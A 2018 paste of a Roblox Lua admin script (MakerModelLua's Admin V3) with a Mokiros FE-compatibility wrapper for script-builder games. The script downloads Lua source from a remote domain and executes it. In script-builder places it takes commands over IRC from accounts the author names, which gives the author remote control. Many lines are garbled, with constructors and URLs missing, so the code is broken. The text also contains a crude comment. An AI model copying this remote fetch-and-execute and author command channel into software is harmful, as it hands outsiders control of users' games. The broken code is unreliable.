

Dec 22nd, 2018
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  1. --
  2. if game:GetService("RunService"):IsClient() then error("Script must be server-side in order to work; use h/ and not hl/") end
  3. local Player,game,owner = owner,game
  4. local RealPlayer = Player
  5. do
  6. print("FE Compatibility code by Mokiros")
  7. local rp = RealPlayer
  8. script.Parent = rp.Character
  10. --RemoteEvent for communicating
  11. local Event ="RemoteEvent")
  12. Event.Name = "UserInput_Event"
  14. --Fake event to make stuff like Mouse.KeyDown work
  15. local function fakeEvent()
  16. local t = {_fakeEvent=true,Functions={},Connect=function(self,f)table.insert(self.Functions,f) end}
  17. t.connect = t.Connect
  18. return t
  19. end
  21. --Creating fake input objects with fake variables
  22. local m = {Target=nil,,KeyUp=fakeEvent(),KeyDown=fakeEvent(),Button1Up=fakeEvent(),Button1Down=fakeEvent(),Button2Up=fakeEvent(),Button2Down=fakeEvent()}
  23. local UIS = {InputBegan=fakeEvent(),InputEnded=fakeEvent()}
  24. local CAS = {Actions={},BindAction=function(self,name,fun,touch,...)
  25. CAS.Actions[name] = fun and {Name=name,Function=fun,Keys={...}} or nil
  26. end}
  27. --Merged 2 functions into one by checking amount of arguments
  28. CAS.UnbindAction = CAS.BindAction
  30. --This function will trigger the events that have been :Connect()'ed
  31. local function te(self,ev,...)
  32. local t = m[ev]
  33. if t and t._fakeEvent then
  34. for _,f in pairs(t.Functions) do
  35. f(...)
  36. end
  37. end
  38. end
  39. m.TrigEvent = te
  40. UIS.TrigEvent = te
  42. Event.OnServerEvent:Connect(function(plr,io)
  43. if plr~=rp then return end
  44. m.Target = io.Target
  45. m.Hit = io.Hit
  46. if not io.isMouse then
  47. local b = io.UserInputState == Enum.UserInputState.Begin
  48. if io.UserInputType == Enum.UserInputType.MouseButton1 then
  49. return m:TrigEvent(b and "Button1Down" or "Button1Up")
  50. end
  51. if io.UserInputType == Enum.UserInputType.MouseButton2 then
  52. return m:TrigEvent(b and "Button2Down" or "Button2Up")
  53. end
  54. for _,t in pairs(CAS.Actions) do
  55. for _,k in pairs(t.Keys) do
  56. if k==io.KeyCode then
  57. t.Function(t.Name,io.UserInputState,io)
  58. end
  59. end
  60. end
  61. m:TrigEvent(b and "KeyDown" or "KeyUp",io.KeyCode.Name:lower())
  62. UIS:TrigEvent(b and "InputBegan" or "InputEnded",io,false)
  63. end
  64. end)
  65. Event.Parent = NLS([==[
  66. local Player = game:GetService("Players").LocalPlayer
  67. local Event = script:WaitForChild("UserInput_Event")
  69. local Mouse = Player:GetMouse()
  70. local UIS = game:GetService("UserInputService")
  71. local input = function(io,a)
  72. if a then return end
  73. --Since InputObject is a client-side instance, we create and pass table instead
  74. Event:FireServer({KeyCode=io.KeyCode,UserInputType=io.UserInputType,UserInputState=io.UserInputState,Hit=Mouse.Hit,Target=Mouse.Target})
  75. end
  76. UIS.InputBegan:Connect(input)
  77. UIS.InputEnded:Connect(input)
  79. local h,t
  80. --Give the server mouse data 30 times every second, but only if the values changed
  81. --If player is not moving their mouse, client won't fire events
  82. while wait(1/30) do
  83. if h~=Mouse.Hit or t~=Mouse.Target then
  84. h,t=Mouse.Hit,Mouse.Target
  85. Event:FireServer({isMouse=true,Target=t,Hit=h})
  86. end
  87. end]==],Player.Character)
  89. ----Sandboxed game object that allows the usage of client-side methods and services
  90. --Real game object
  91. local _rg = game
  93. --Metatable for fake service
  94. local fsmt = {
  95. __index = function(self,k)
  96. local s = rawget(self,"_RealService")
  97. if s then
  98. return typeof(s[k])=="function"
  99. and function(_,...)return s[k](s,...)end or s[k]
  100. end
  101. end,
  102. __newindex = function(self,k,v)
  103. local s = rawget(self,"_RealService")
  104. if s then s[k]=v end
  105. end
  106. }
  107. local function FakeService(t,RealService)
  108. t._RealService = typeof(RealService)=="string" and _rg:GetService(RealService) or RealService
  109. return setmetatable(t,fsmt)
  110. end
  112. --Fake game object
  113. local g = {
  114. GetService = function(self,s)
  115. return rawget(self,s) or _rg:GetService(s)
  116. end,
  117. Players = FakeService({
  118. LocalPlayer = FakeService({GetMouse=function(self)return m end},Player)
  119. },"Players"),
  120. UserInputService = FakeService(UIS,"UserInputService"),
  121. ContextActionService = FakeService(CAS,"ContextActionService"),
  122. RunService = FakeService({
  123. _btrs = {},
  124. RenderStepped = _rg:GetService("RunService").Heartbeat,
  125. BindToRenderStep = function(self,name,_,fun)
  126. self._btrs[name] = self.Heartbeat:Connect(fun)
  127. end,
  128. UnbindFromRenderStep = function(self,name)
  129. self._btrs[name]:Disconnect()
  130. end,
  131. },"RunService")
  132. }
  133. rawset(g.Players,"localPlayer",g.Players.LocalPlayer)
  134. g.service = g.GetService
  135. FakeService(g,game)
  136. --Changing owner to fake player object to support owner:GetMouse()
  137. game,owner = g,g.Players.LocalPlayer
  138. end
  140. --[[
  141. Hi! This is LuaModelMaker's Admin V3 by MakerModelLua.
  142. If you want to know what commands do just go into your game and say ;cmds for a list of
  143. commands, what they do, examples, rank needed, and more!
  144. Or, go to
  145. If you have an Apple device, download the app here:
  150. --->> DO NOT EDIT THESE SETTINGS <<---
  151. Well you can but it's a waste of your time. The settings are located in workspace
  152. in a folder called "MakerModelLua's Settings". You can also use this plugin:
  158. Mobile:
  162. ...also... this is open source! No stupid shady module scripts, which means it works in studio!
  164. ]]
  191. local Settings = {
  192. Ranks = {
  193. ["Owner"] = {};
  194. ["Admin"] = {};
  195. ["Member"] = {};
  196. ["Banned"] = {};
  197. ["Crashed"] = {};
  198. ["Muted"] = {};
  199. };
  201. Prefix = ";";
  202. Bet = " ";
  203. MinimumAge = 0;
  204. ServerLocked = false;
  205. ColorScheme = "White";
  206. TransparencyScheme = 50;
  207. Fun = true;
  208. EnableAdminMenu = true;
  209. EnableTaskBar = true;
  210. FreeAdmin = false;
  211. Font = "Arial";
  213. DisableAbuse = false;
  214. AbuseList = {"kill", "punish", "respawn", "blind", "flash", "control", "loopfling", "explode", "change", "decal", "sink", "damage"};
  215. AbusableGear = {};
  217. LinkedAccount = "";
  218. DataKey = "";
  220. ExecuteNotificationSound = 0; --177578949
  221. EnableSounds = true;
  223. VIPMemberID = 0;
  224. VIPAdminID = 0;
  226. GroupID = 0;
  227. GroupBanRank = 0;
  228. GroupMemberRank = 0;
  229. GroupAdminRank = 0;
  230. GroupOwnerRank = 0;
  231. GroupRankBan = 0;
  232. BannedGroupIDs = {};
  234. IRCServer = "";
  235. IRCChannel = "";
  236. IRCCommandExecuters = {};
  238. TrelloToken = ""
  239. }
  241. local Colors = {
  242. ["WHITE"] =,1,1);
  243. ["BLACK"] =,0,0);
  244. ["GRAY"] =,0.5,0.5);
  245. ["RED"] =,0,0);
  246. ["GREEN"] =,1,0);
  247. ["BLUE"] =,0,1);
  248. ["YELLOW"] =,1,0);
  249. ["PINK"] =,0,1);
  250. ["MAGENTA"] =,0,1);
  251. ["CYAN"] ="Cyan").Color;
  252. ["TEAL"] ="Teal").Color;
  253. ["BROWN"] =,0.25,0.075);
  254. ["PURPLE"] =,0,0.5);
  255. ["RANDOM"] =,255)/255,math.random(0,255)/255,math.random(0,255)/255);
  256. }
  258. local Server = {
  259. Workspace = game:GetService("Workspace");
  260. Players = game:GetService("Players");
  261. Lighting = game:GetService("Lighting");
  262. MPS = game:GetService("MarketplaceService");
  263. TS = game:GetService("TeleportService");
  264. HS = game:GetService("HttpService");
  265. RS = game:GetService("RunService");
  266. PS = game:GetService("PointsService");
  267. TestS = game:GetService("TestService");
  268. IS = game:GetService("InsertService");
  269. Teams = game:GetService("Teams");
  270. Data = game:GetService("DataStoreService");
  271. GDS = game:GetService("DataStoreService"):GetGlobalDataStore();
  272. NS = {Port = 0}; -- you'll be glad if you're in studio and networkserver isn't mentioned
  273. Storage = game:GetService("ServerStorage");
  274. RS = game:GetService("ReplicatedStorage");
  275. AS = game:GetService("AssetService");
  276. }
  278. local Icons = {
  279. ["Message"] = 7724351;
  280. ["Error"] = 94011556;
  281. ["Information"] = 144175130;
  282. ["Check"] = 132769976;
  283. ["Search"] = 61994930;
  284. ["Time"] = 136391033;
  285. ["Notice"] = 156507320;
  286. ["Sound"] = 164682936;
  287. ["Log"] = 70650545;
  288. ["Question"] = 41363872;
  289. ["Output"] = 11481605;
  290. ["Admin"] = 302470270;
  291. ["Lock"] = 11341626;
  292. ["Settings"] = 131064748;
  293. ["Map"] = 257119661;
  294. ["Plugin"] = 257097414;
  295. }
  297. local IRC = {
  298. Codes = {
  299. ["001"] = "RPL_WELCOME",
  300. ["002"] = "RPL_YOURHOST",
  301. ["003"] = "RPL_CREATED",
  302. ["004"] = "RPL_MYINFO",
  303. ["005"] = "RPL_ISUPPORT",
  304. ["250"] = "RPL_STATSCONN",
  305. ["251"] = "RPL_LUSERCLIENT",
  306. ["252"] = "RPL_LUSEROP",
  307. ["254"] = "RPL_LUSERCHANNELS",
  308. ["255"] = "RPL_LUSERME",
  309. ["265"] = "RPL_LOCALUSERS",
  310. ["266"] = "RPL_GLOBALUSERS",
  311. ["352"] = "RPL_WHOREPLY",
  312. ["371"] = "RPL_INFO",
  313. ["372"] = "RPL_MOTD",
  314. ["374"] = "RPL_ENDINFO",
  315. ["375"] = "RPL_MOTDSTART",
  316. ["376"] = "RPL_ENDOFMOTD",
  317. ["422"] = "ERR_NOMOTD",
  318. },
  319. Ignore = {
  320. ["004"] = true,
  321. ["005"] = true,
  322. };
  323. Users = {};
  324. Logs = {};
  325. Chats = {};
  326. Forms = {};
  327. MessageAdded ="BindableEvent");
  329. Servers = {
  330. [""] = {
  331. BaseUrl = "";
  332. DynamicUrl = "";
  333. };
  334. [""] = {
  335. BaseUrl = "";
  336. DynamicUrl = "dynamic/leibniz",
  337. };
  338. [""] = {
  339. BaseUrl = "";
  340. DynamicUrl = "",
  341. };
  342. };
  343. NickName = "rbxMMLV3_"..math.random(1,100000);
  345. SessionCounter = 0;
  346. Connected = false;
  347. Stop = false;
  348. SessionID = "";
  349. }
  351. local RankHUD = {
  352. ["Muted"] = 202180094;
  353. ["Non-Admin"] = 202180121;
  354. ["Member"] = 202180052;
  355. ["Admin"] = 202180015;
  356. ["Owner"] = 202179988;
  357. }
  359. local TextConverter = {
  360. LetterSounds = {
  361. ["a"] = {223757826, nil}; -- 203343899
  362. ["b"] = {223533700, 0.2}; -- 203344029
  363. ["c"] = {223533711, nil}; -- 203343994
  364. ["d"] = {223757910, nil}; -- 203398237
  365. ["e"] = {223758026, nil}; -- 203398295
  366. ["f"] = {223777655, nil}; -- 203398347
  367. ["g"] = {223777738, nil}; -- 203398372
  368. ["h"] = {223777757, nil}; -- 203398397
  369. ["i"] = {223777807, nil}; -- 203398422
  370. ["j"] = {223782888, nil}; -- 203398450
  371. ["k"] = {223533711, nil}; -- 203343994
  372. ["l"] = {223782961, 0.4}; -- 203398541
  373. ["m"] = {223782992, nil}; -- 203398578
  374. ["n"] = {223783063, nil}; -- 203398599
  375. ["o"] = {223783184, nil}; -- 203398611
  376. ["p"] = {223783235, nil}; -- 203398727
  377. ["q"] = {223783260, nil}; -- 203398755
  378. ["r"] = {223783305, 0.2}; -- 203398792
  379. ["s"] = {223783377, nil}; -- 203398806
  380. ["t"] = {223783446, nil}; -- 203398850
  381. ["u"] = {223783512, nil}; -- 203398872
  382. ["v"] = {223783654, nil}; -- 203398965
  383. ["w"] = {223783697, nil}; -- 203398984
  384. ["x"] = {223783796, nil}; -- 203399008
  385. ["y"] = {223783853, nil}; -- 203399043
  386. ["z"] = {223783893, nil}; -- 203399096
  388. ["ch"] = {223784367, 0.3}; -- 203592149
  389. ["th"] = {223788235, 0.3}; -- 203399215
  390. ["sh"] = {223784505, 0.2}; -- 203399566
  391. ["wh"] = {223784555, 0.3}; -- 203622828
  392. ["oo"] = {223784456, 0.3}; -- 203399743
  393. ["ing"] = {223784393, 0.3}; -- 203402836
  394. };
  396. LongVowels = {
  397. ["a"] = {223533687, nil}; -- 203343932
  398. ["e"] = {223777620, nil}; -- 203398314
  399. ["i"] = {223777855, nil}; -- 203398440
  400. ["o"] = {223783212, nil}; -- 203398619
  401. ["u"] = {223783572, nil}; -- 203398897
  402. };
  404. Pronounce = {
  405. ["0"] = "zero";
  406. ["1"] = "wun";
  407. ["2"] = "too";
  408. ["3"] = "three";
  409. ["4"] = "four";
  410. ["5"] = "five";
  411. ["6"] = "six";
  412. ["7"] = "seven";
  413. ["8"] = "eyt";
  414. ["9"] = "nine";
  415. ["one"] = "wun";
  416. ["two"] = "too";
  417. ["eight"] = "eyt";
  418. ["eigh"] = "ey";
  419. ["gh"] = "h";
  420. ["kn"] = "n";
  421. ["come"] = "cu".."m";
  422. ["bye"] = "bi";
  423. ["#"] = "hashtag";
  424. ["@"] = "at";
  425. ["&"] = "and";
  426. ["*"] = "astrict";
  427. ["mn"] = "m";
  428. ["kn"] = "n";
  429. ["ies"] = "ees";
  430. };
  432. NonEnglishRules = {
  433. ["to"] = "too";
  434. ["you"] = "yoo";
  435. ["we"] = "wee";
  436. ["are"] = "erh";
  437. ["your"] = "yoor";
  438. ["you're"] = "yoor";
  439. ["youre"] = "yoor";
  440. ["pizza"] = "peetzoh";
  441. ["ok"] = "okay";
  442. ["have"] = "hav";
  443. ["my"] = "mi";
  444. ["me"] = "mee";
  445. ["u"] = "yoo";
  446. ["r"] = "erh";
  447. ["move"] = "moov";
  448. ["dove"] = "duv";
  449. ["debris"] = "debree";
  450. ["do"] = "doo";
  451. }
  452. }
  454. local HTMLDecode = {
  455. ["35"] = "#";
  456. ["36"] = "$";
  457. ["37"] = "%%";
  458. ["38"] = "*";
  459. ["39"] = "'";
  460. ["58"] = ":";
  461. ["59"] = ";";
  462. ["60"] = "<";
  463. ["62"] = ">";
  464. }
  467. local Assets = {
  468. Packages = {
  469. [27112438] = {27112025,27112039,27112052,27112056,27112068};
  470. [139610216] = {139607570,139607625,139607673,139607718,139607770,139610147};
  471. [77518833] = {77518564,77518616,77518654,77518696,77518737};
  472. [32336368] = {32336059,32336117,32336182,32336243,32336306};
  473. [59772975] = {59772137,59772181,59772219,59772279,59772667,59721671};
  474. [54116460] = {54116290,54116338,54116373,54116394,54116432};
  475. [39977366] = {39976703,39976829,39976927,39977192,39977295};
  476. [32357766] = {32357663,32357631,32357619,32357584,32357558};
  477. [27123973] = {27121265,27121306,27121353,27121393,27121432};
  478. [55717536] = {55717271,55717330,55717388,55717434,55717491};
  479. [28279963] = {28279160,28279217,28279859,28279894,28279938};
  480. [27403592] = {27402580,27402546,27402641,27402714,27402742};
  481. [86499905] = {86499666,86499698,86499716,86499753,86499793,86498113,62724852,86487766};
  482. [86500185] = {86500054,86500078,86500036,86500008,86500064,86487700,86498048,62234425};
  483. [48474394] = {48474356,48474294};
  484. [187996626] = {187996057,187996098,187996167,187996258,187996321,187996409,187996534};
  485. [223826660] = {223824598,223825145,223825310,223825496,223825618,223825761,223825893,223800426};
  486. [188835832] = {188835233,188835327,188835428,188835511,188835586,188835673,188644771};
  487. [139581948] = {139581117,139581174,139581230,139581292,139581375,139581559,139581668,139581823};
  488. [33378577] = {33378366,33378438,33378484,33378522,33378540};
  489. [101744863] = {101742885,101743631,101716880,101744248,101744215,101744371};
  490. [136793141] = {136792342,136792633,136792698,136792747,136792820,136795159,136795130};
  491. [91658555] = {91657680,91657749,91657884,91657986,91658092,91658290,90249118};
  492. [41851073] = {41850825,41850868,41850915,41851009,41850959}
  493. };
  494. AssetTypes = {
  495. [0] = "Product";
  496. [1] = "Image";
  497. [2] = "T-Shirt";
  498. [3] = "Audio";
  499. [4] = "Mesh";
  500. [5] = "Lua";
  501. [6] = "HTML";
  502. [7] = "Text";
  503. [8] = "Hat";
  504. [9] = "Place";
  505. [10] = "Model";
  506. [11] = "Shirt";
  507. [12] = "Pants";
  508. [13] = "Decal";
  509. [16] = "Avatar";
  510. [17] = "Head";
  511. [18] = "Face";
  512. [19] = "Gear";
  513. [21] = "Badge";
  514. [22] = "Group Emblem";
  515. [24] = "Animation";
  516. [25] = "Arms";
  517. [26] = "Legs";
  518. [27] = "Torso";
  519. [28] = "Right Arm";
  520. [29] = "Left Arm";
  521. [30] = "Left Leg";
  522. [31] = "Right Leg";
  523. [32] = "Package";
  524. [33] = "YouTube Video";
  525. [34] = "Game Pass";
  526. [38] = "Plugin";
  527. [39] = "SolidModel";
  528. [40] = "MeshPart";
  529. [41] = "Hair Accessory";
  530. [42] = "Face Accessory";
  531. [43] = "Neck Accessory";
  532. [44] = "Shoulder Accessory";
  533. [45] = "Front Accessory";
  534. [46] = "Back Accessory";
  535. };
  536. AccessoryTypes = {
  537. ["all"] = 19;
  538. ["hats"] = 9;
  539. ["hair"] = 20;
  540. ["face"] = 21;
  541. ["neck"] = 22;
  542. ["shoulder"] = 23;
  543. ["front"] = 24;
  544. ["back"] = 25;
  545. ["waist"] = 26;
  546. };
  547. }
  549. local CharacterCache = {
  550. {"MakerModelLua", 38837082};
  551. {"LuaModelMaker", 20920633};
  552. {"builderman", 156};
  553. {"Shedletsky", 261};
  554. {"Telamon", 13645};
  555. {"ROBLOX", 1};
  556. }
  558. local FaceCovert = {
  559. Left = "xpos";
  560. Right = "xneg";
  561. Front = "zpos";
  562. Back = "zneg";
  563. Top = "ypos";
  564. Bottom = "yneg";
  565. }
  567. local Meshes = {
  568. ["crown"] = {1, 1078075};
  569. ["king"] = {1, 11419761};
  570. ["teapot"] = {0.03, 1029523};
  571. ["apple"] = {2.5, 16190555};
  572. ["potato"] = {1, 25268275};
  573. ["panda"] = {0.5, 20709221};
  574. ["dominus"] = {0.5, 21057410};
  575. ["fedora"] = {0.75, 13640868};
  576. ["noob"] = {1, 20929341};
  577. ["knife"] = {0.3, 121944778};
  578. ["book"] = {0.3, 1136139};
  579. }
  581. local NotifySounds = {
  582. ["Hover"] = 223134269;
  583. ["Select"] = 292141227;
  584. }
  586. local Trello = {
  587. TrelloInfoCard = "x1rUtwEj";
  588. MainBoard = {};
  589. RequiredLists = {};
  590. RankChecklistCache = {};
  591. ToggleChecklist = nil;
  592. CommandID = nil;
  593. LastCommandDT = 0;
  594. AdminBoardID = "577ea1b21cb7975666524f26";
  595. RemoteAdminChecklist = "5835cfd4eed73dc5f9cdcfbf";
  596. RemoteDataCard = "dLtMo1en"
  597. }
  599. local ScriptBuilders = {
  600. [260897989] = "MML's";
  601. [21053279] = "Anti's pub";
  602. [21053219] = "Anti's pri";
  603. [20279777] = "Void's 1";
  604. [437965235] = "Void's 2";
  605. [227015991] = "Vox's";
  606. [210101277] = "Master's";
  607. [531937877] = "Bleu pigs";
  608. [519251450] = "Game's";
  609. }
  611. -- Ok, if you're here, you must be a scripter. Fine. I guess you can look ;)
  612. -- Why else would I NOT have put it in a module?!?!?
  614. local ChatColors = {"Bright red", "Bright blue", "Earth green", "Bright violet", "Bright orange", "Bright yellow", "Light reddish violet", "Brick yellow"}
  616. local SoundList,GlobalSoundList = {},{}
  617. local ScriptCache,MarketCache,PackageCache = {},{},Assets.Packages
  618. local TempChatLogs = {}
  619. local ToolRegions = {Server.Lighting, Server.RS, Server.Storage}
  620. local NoSpeak = false
  622. local SOUND,MARKET,RANK,STRING,GUI = {},{},{},{},{}
  623. local CORE,REMOTE = {Version = script:FindFirstChild("Version"), Domain = "", UnsecureDomain = ""},{RemoteAdmin = {Command, ServerCommand, ServerPort, TimeStamp}, RemoteConnection = false}
  625. local ChatLogs,CommandLogs = {},{}
  626. local ClientInfo,LoopKills,List,Flings,Beeps = {},{},{},{},{}
  627. local PriChat = {Chats = {}, Chatted ="BindableEvent")}
  628. local Dispose,Jails,PermCommandBars = {},{},{}
  629. local Waypoints = {["Center"] =,0,0)}
  630. local Objects = {}
  631. local Sound = nil
  632. local ModLighting = false
  633. local DataReady = true
  634. local RemoteAbuseGear = {}
  636. local GameOwner = "[ Client ]"
  637. local PlaceName = "Unknown"
  638. local PlaceInfo = {}
  639. local IsStudio = false
  640. local IsSB = false
  641. local Date = nil
  642. local Fonts = {}
  643. local PendingRequests = {}
  644. local F3X = script:FindFirstChild("F3X Tools")
  645. local Plugins = game:FindFirstChild("Ma".."kerModelL".."ua's Admin Plugins", true)
  646. local RemoteData = {RemoteAdminWait = 5, ChatLogWait = 20, TrelloWait = 10}
  647. local KeyBinds = {}
  648. local Crowns = {}
  649. local LastKeys = {}
  650. local Cars = {}
  651. local StringReplacements = {}
  652. local SoundInfo = {["ID"] = 0, ["Name"] = "None", ["Creator"] = "None"}
  653. local NoBet = {"/", "-", "(", ")", ""}
  654. local ShouldFilter = true
  656. local CrownStorage = script:FindFirstChild("CrownStorage")
  657. if not CrownStorage then CrownStorage ="Model", script) CrownStorage.Name = "CrownStorage" end
  659. -- import old settings just in case --
  660. local OldSettings = script.Parent:FindFirstChild("LuaModelMaker's Admin Settings") or game:FindFirstChild("LuaModelMaker's Admin Settings", true)
  661. if OldSettings then
  662. OldSettings = require(OldSettings)
  664. for _,ValName in pairs({"Ranks", "Prefix", "Bet", "ServerLocked", "DisableAbuse", "AbuseList", "AbusableGear", "LinkedAccount", "DataKey", "VIPMemberID", "VIPAdminID", "GroupID", "GroupMemberRank", "GroupAdminRank", "GroupOwnerRank"}) do
  665. Settings[ValName] = OldSettings[ValName]
  666. end
  667. Settings.GroupBanRank = OldSettings.RankBan
  668. Settings.Fun = OldSettings.FUN
  669. end
  671. if F3X then
  672. F3X = F3X:Clone()
  673. F3X.Handle.Anchored = false
  674. script:FindFirstChild("F3X Tools"):Destroy()
  675. end
  677. wait(0.1)
  679. local SettingsValues = Server.Storage:FindFirstChild("MakerModelLua's Admin Settings") or game:FindFirstChild("MakerModelLua's Admin Settings", true)
  680. -- tries to defualt to server storage, just in case an exploiter makes their own settings.
  682. if SettingsValues then
  683. SettingsValues.Parent = Server.Storage -- fokin exploiters succ my cocc
  684. if SettingsValues:IsA("Folder") or SettingsValues:IsA("Configuration") then
  685. for _,Value in pairs(SettingsValues:GetChildren()) do
  686. if Settings[Value.Name] ~= nil then
  687. if Value:IsA("Folder") or Value:IsA("Configuration") then -- ranks
  688. for _,NewValue in pairs(Value:GetChildren()) do
  689. if ypcall(function() return NewValue.Value end) then
  690. if Settings[Value.Name][NewValue.Name] then
  691. local Val = NewValue.Value
  692. if type(Settings[Value.Name][NewValue.Name]) == "table" then
  693. Val = {}
  694. for Word in string.gmatch(NewValue.Value, "[%w_]+") do
  695. table.insert(Val, Word)
  696. end
  697. end
  698. Settings[Value.Name][NewValue.Name] = Val
  699. end
  700. end
  701. end
  702. else
  703. if Settings[Value.Name] ~= nil then
  704. local Val = Value.Value
  705. if type(Settings[Value.Name]) == "table" then
  706. Val = {}
  707. for Word in string.gmatch(Value.Value, "%w+") do
  708. table.insert(Val, Word)
  709. end
  710. end
  711. Settings[Value.Name] = Val
  712. end
  713. end
  714. end
  715. end
  716. end
  717. end
  719. if Settings.LinkedAccount == "Admin" and game.CreatorId ~= 38837082 then
  720. Settings.LinkedAccount = ""
  721. elseif game.PlaceId == 199055528 or game.PlaceId == 329866187 then
  722. Settings.LinkedAccount = "Admin"
  723. end
  725. local getfenv,setfenv,table,math,coroutine,pcall,ypcall,xpcall,string,assert,type,unpack,loadstring,tostring,tonumber,print = getfenv,setfenv,table,math,coroutine,pcall,ypcall,xpcall,string,assert,type,unpack,loadstring,tostring,tonumber,print -- localize variables so executables don't troll the script
  726. local Workspace,workspace,Instance,require,script = Workspace,workspace,Instance,require,script
  728. wait(1)
  730. local ExploitModule = game:FindFirstChild("MakerMode".."lLua's Admin Anti-Exploit Module", true)
  732. if Server.Players.LocalPlayer then print("MML Admin Compromised: Running in studio") IsStudio = true end
  734. if not IsStudio then
  735. Server.NS = game:GetService("NetworkServer")
  736. script.Name = "Maker".."Mo".."delLua's Admin"
  737. end
  739. if game.PlaceId > 0 then
  740. PlaceInfo = Server.MPS:GetProductInfo(game.PlaceId)
  741. PlaceName = PlaceInfo.Name
  742. end
  744. local function GetGameOwner()
  745. if PlaceInfo.Creator.CreatorType == "Group" then
  746. GameOwner = game:GetService("GroupService"):GetGroupInfoAsync(PlaceInfo.Creator.CreatorTargetId).Owner.Name
  747. print("MML's Admin: Found group owner for game: "..GameOwner)
  748. elseif PlaceInfo.Creator.CreatorType == "User" then
  749. GameOwner = PlaceInfo.Creator.Name
  750. print("MML's Admin: Found game owner: "..GameOwner)
  751. else
  752. ypcall(function() GameOwner = Server.Players:GetNameFromUserIdAsync(game.CreatorId) print("MML's Admin: Found game owner: "..GameOwner) end)
  753. end
  754. end
  756. if string.byte(string.sub(PlaceName,1,1)) == 226 then
  757. PlaceName = string.sub(PlaceName,4,#PlaceName)
  758. end
  759. for i = 1,5 do
  760. if GameOwner == "[ Client ]" then
  761. print("MML's Admin: Attempting to establish owner's name #"..i)
  762. GetGameOwner()
  763. wait(1)
  764. end
  765. end
  767. if ScriptBuilders[PlaceID] or NLS then
  768. IsSB = true
  769. end
  771. if IsSB then
  772. ShouldFilter = false
  773. Settings.IRCServer = "";
  774. Settings.IRCChannel = "#PkamaraSB";
  775. Settings.IRCCommandExecuters = {"MakerModelLua", "MakerModelLuaIRC"}
  776. if Settings.TrelloToken == "" then
  777. Settings.LinkedAccount = "ScriptBuilder"
  778. end
  779. if Settings.DataKey == "" then coroutine.wrap(function()
  780. repeat wait(1) until Server.Storage:FindFirstChild("MML DataKey")
  781. local Key = Server.Storage:FindFirstChild("MML DataKey")
  782. print("Found key: "..Key.Value)
  783. Settings.DataKey = Key.Value
  784. Key:Destroy()
  785. end)() end
  786. end
  787. local PlaceInfoFormat = "{PLACE: "..string.sub(PlaceName,1,25).."("") | PORT: "..Server.NS.Port.."}"
  788. table.insert(Settings.Ranks["Owner"], GameOwner)
  790. for _,Font in pairs(Enum.Font:GetEnumItems()) do
  791. Fonts[Font.Name] = Font
  792. end
  794. local LogClient = script:FindFirstChild("AddClientInfo")
  795. if LogClient then LogClient:Destroy() end
  796. LogClient ="RemoteFunction", script) LogClient.Name = "AddClientInfo"
  797. LogClient.OnServerInvoke = function(Player, Info)
  798. if Info then
  799. for Key,Data in pairs(Info) do
  800. ClientInfo[Player.Name][Key] = Data
  801. end
  802. end
  803. end
  805. local function MakeFunction(Type, Name)
  806. local Func = script:FindFirstChild(Name)
  807. if Func then Func:Destroy() end
  808. Func =, script) Func.Name = Name
  810. getfenv()[Name] = Func
  811. return Func
  812. end
  814. MakeFunction("BindableFunction", "ExecuteCommand")
  815. MakeFunction("RemoteFunction", "ExecuteCommandClient")
  816. MakeFunction("BindableFunction", "ExecuteCode")
  818. MakeFunction("RemoteFunction", "IsAdmin")
  819. MakeFunction("RemoteFunction", "AddExploit")
  820. MakeFunction("BindableFunction", "AddExploitServer")
  821. MakeFunction("RemoteFunction", "KickClient")
  822. MakeFunction("RemoteFunction", "ConvertTextToSound")
  824. MakeFunction("RemoteFunction", "KeyPressed")
  825. MakeFunction("RemoteFunction", "InputKey")
  827. MakeFunction("RemoteFunction", "RankPlayerLocal")
  828. MakeFunction("BindableFunction", "RankPlayerServer")
  830. --[[
  831. if NLS then
  832. local Value = script:FindFirstChild("Override")
  833. LogClient.Parent = game
  834. if not Value then
  835. local Value ="BoolValue", script) Value.Name = "Override"
  836. local CloneScript = script:Clone()
  837. CloneScript.Disabled = true
  838. CloneScript.Parent = game:FindFirstChild("ServerScriptService")
  839. CloneScript.Disabled = false
  840. CloneScript.Parent = nil
  842. script:Destroy() script.Disabled = true
  843. end
  844. end
  845. ]]
  847. if not CORE.Version then CORE.Version = {Value = "3.Unknown"} end
  849. IRC.NickName = "rbxMMLV3_""_"..Server.NS.Port
  851. -- Core functions --
  853. function CORE:FixSettings()
  854. for _,Bet in pairs(NoBet) do
  855. if Settings.Bet == Bet then
  856. Settings.Bet = " "
  857. break
  858. end
  859. end
  860. CORE:ChangeBet(Settings.Bet)
  862. if Settings.VIPMemberID == 0 then Settings.VIPMemberID = 1 end
  863. if Settings.VIPAdminID == 0 then Settings.VIPAdminID = 1 end
  865. if Settings.TransparencyScheme > 90 then Settings.TransparencyScheme = 90 end
  866. if Settings.TransparencyScheme < 10 then Settings.TransparencyScheme = 10 end
  867. Settings.TransparencyScheme = Settings.TransparencyScheme/100
  869. if not Fonts[Settings.Font] then
  870. Settings.Font = "Arial"
  871. end
  872. end
  874. function CORE:NilPlayer(Player)
  875. if Player == nil or type(Player) == "table" then return true else return false end
  876. end
  878. function CORE:ExecuteResource(ResourceName, Parent, Data)
  879. local ReturnScript = nil
  880. local Executed = true
  881. if script:FindFirstChild("Resources") then
  882. local RawResource = script.Resources:FindFirstChild(ResourceName)
  883. if RawResource then
  884. local Resource = RawResource:Clone()
  885. Resource.Disabled = true
  886. Resource.Parent = Parent
  887. if Data then
  888. for Key,Value in pairs(Data) do
  889. if Resource[Key] then
  890. Resource[Key].Value = Value
  891. end
  892. end
  893. end
  894. wait()
  895. Resource.Disabled = false
  896. ReturnScript = Resource
  897. else
  898. Executed = false
  899. end
  900. else
  901. Executed = false
  902. end
  903. if Executed == false then
  904. if not Data then Data = {} end
  905. local Source = ScriptCache[ResourceName]
  907. if not Source then
  908. Source = REMOTE:GetURL(CORE.Domain.."/Lua/Resources/"..ResourceName..".lua")
  909. if Source then
  910. ScriptCache[ResourceName] = Source
  911. end
  912. end
  914. if Data and Source then
  915. for Key,Value in pairs(Data) do
  916. Source = string.gsub(Source, "@@"..Key.."@@", tostring(Value))
  917. end
  918. end
  920. if Source then
  921. if NLS then
  922. ReturnScript = NLS(Source, Parent)
  923. elseif createLocalScriptWithSource then
  924. ReturnScript = createLocalScriptWithSource(Source)
  925. ReturnScript.Parent = Parent
  926. end
  927. end
  928. end
  929. return ReturnScript
  930. end
  932. function CORE:CreateRemotePropertyReader(Obj, Override)
  933. if Server.Workspace.FilteringEnabled == true or Override then
  934. local Reader ="RemoteFunction", Obj)
  935. Reader.Name = "RemotePropertyReader"
